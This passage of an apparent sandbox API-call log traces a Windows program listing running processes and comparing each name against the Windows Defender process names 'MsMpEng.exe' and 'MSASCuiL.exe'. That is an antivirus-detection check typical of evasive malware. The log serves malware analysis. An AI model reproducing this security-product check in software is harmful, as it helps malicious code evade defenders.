[0103.914] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0103.915] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MsMpEng.exe") returned -1 [0103.915] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0103.916] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MsMpEng.exe") returned -1 [0103.916] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0103.917] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MsMpEng.exe") returned 1 [0103.917] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0103.918] lstrcmpiW (lpString1="mod.exe", lpString2="MsMpEng.exe") returned -1 [0103.918] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0103.919] lstrcmpiW (lpString1="completing-h.exe", lpString2="MsMpEng.exe") returned -1 [0103.919] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0103.920] lstrcmpiW (lpString1="water granny.exe", lpString2="MsMpEng.exe") returned 1 [0103.920] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0103.921] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MsMpEng.exe") returned 1 [0103.921] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0103.922] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MsMpEng.exe") returned 1 [0103.922] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0103.923] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MsMpEng.exe") returned 1 [0103.923] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0103.924] lstrcmpiW (lpString1="luther.exe", lpString2="MsMpEng.exe") returned -1 [0103.924] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0103.925] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MsMpEng.exe") returned 1 [0103.925] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.925] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.926] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0103.926] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MsMpEng.exe") returned 1 [0103.926] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.927] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MsMpEng.exe") returned 1 [0103.927] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.928] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.928] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x8e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fulezad.exe")) returned 1 [0103.929] lstrcmpiW (lpString1="fulezad.exe", lpString2="MsMpEng.exe") returned -1 [0103.929] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.930] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0103.930] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.931] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0103.931] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0103.931] CloseHandle (hObject=0xec) returned 1 [0103.932] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xe8 [0103.936] Process32FirstW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.937] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCuiL.exe") returned -1 [0103.937] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.938] lstrcmpiW (lpString1="System", lpString2="MSASCuiL.exe") returned 1 [0103.938] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.939] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCuiL.exe") returned 1 [0103.939] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.939] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0103.939] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.940] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCuiL.exe") returned 1 [0103.940] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.941] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0103.941] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.941] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCuiL.exe") returned 1 [0103.941] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.942] lstrcmpiW (lpString1="services.exe", lpString2="MSASCuiL.exe") returned 1 [0103.942] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.942] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCuiL.exe") returned -1 [0103.942] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.943] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCuiL.exe") returned -1 [0103.943] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.944] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.944] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.944] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.944] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.945] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.945] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.946] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.946] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.946] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.946] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.947] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCuiL.exe") returned -1 [0103.947] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.948] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.948] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.948] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.948] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.949] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCuiL.exe") returned -1 [0103.949] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.950] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCuiL.exe") returned -1 [0103.950] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.951] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCuiL.exe") returned 1 [0103.951] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.952] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0103.952] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.188] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0104.188] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0104.188] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCuiL.exe") returned 1 [0104.188] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0104.189] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCuiL.exe") returned 1 [0104.189] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.190] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCuiL.exe") returned 1 [0104.190] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.191] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0104.191] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0104.192] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MSASCuiL.exe") returned -1 [0104.192] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0104.193] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MSASCuiL.exe") returned 1 [0104.193] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0104.193] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MSASCuiL.exe") returned -1 [0104.193] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0104.194] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MSASCuiL.exe") returned -1 [0104.194] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0104.195] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MSASCuiL.exe") returned -1 [0104.195] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0104.196] lstrcmpiW (lpString1="compliant.exe", lpString2="MSASCuiL.exe") returned -1 [0104.196] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0104.197] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MSASCuiL.exe") returned -1 [0104.197] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0104.198] lstrcmpiW (lpString1="fixes.exe", lpString2="MSASCuiL.exe") returned -1 [0104.198] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0104.199] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MSASCuiL.exe") returned -1 [0104.199] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0104.200] lstrcmpiW (lpString1="practice sees.exe", lpString2="MSASCuiL.exe") returned 1 [0104.200] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0104.200] lstrcmpiW (lpString1="mind.exe", lpString2="MSASCuiL.exe") returned -1 [0104.200] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0104.201] lstrcmpiW (lpString1="autos.exe", lpString2="MSASCuiL.exe") returned -1 [0104.201] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0104.209] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MSASCuiL.exe") returned 1 [0104.209] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0104.210] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MSASCuiL.exe") returned -1 [0104.210] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0104.210] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MSASCuiL.exe") returned -1 [0104.210] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0104.211] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MSASCuiL.exe") returned 1 [0104.211] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0104.212] lstrcmpiW (lpString1="mod.exe", lpString2="MSASCuiL.exe") returned -1 [0104.212] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0104.213] lstrcmpiW (lpString1="completing-h.exe", lpString2="MSASCuiL.exe") returned -1 [0104.213] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0104.213] lstrcmpiW (lpString1="water granny.exe", lpString2="MSASCuiL.exe") returned 1 [0104.213] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, 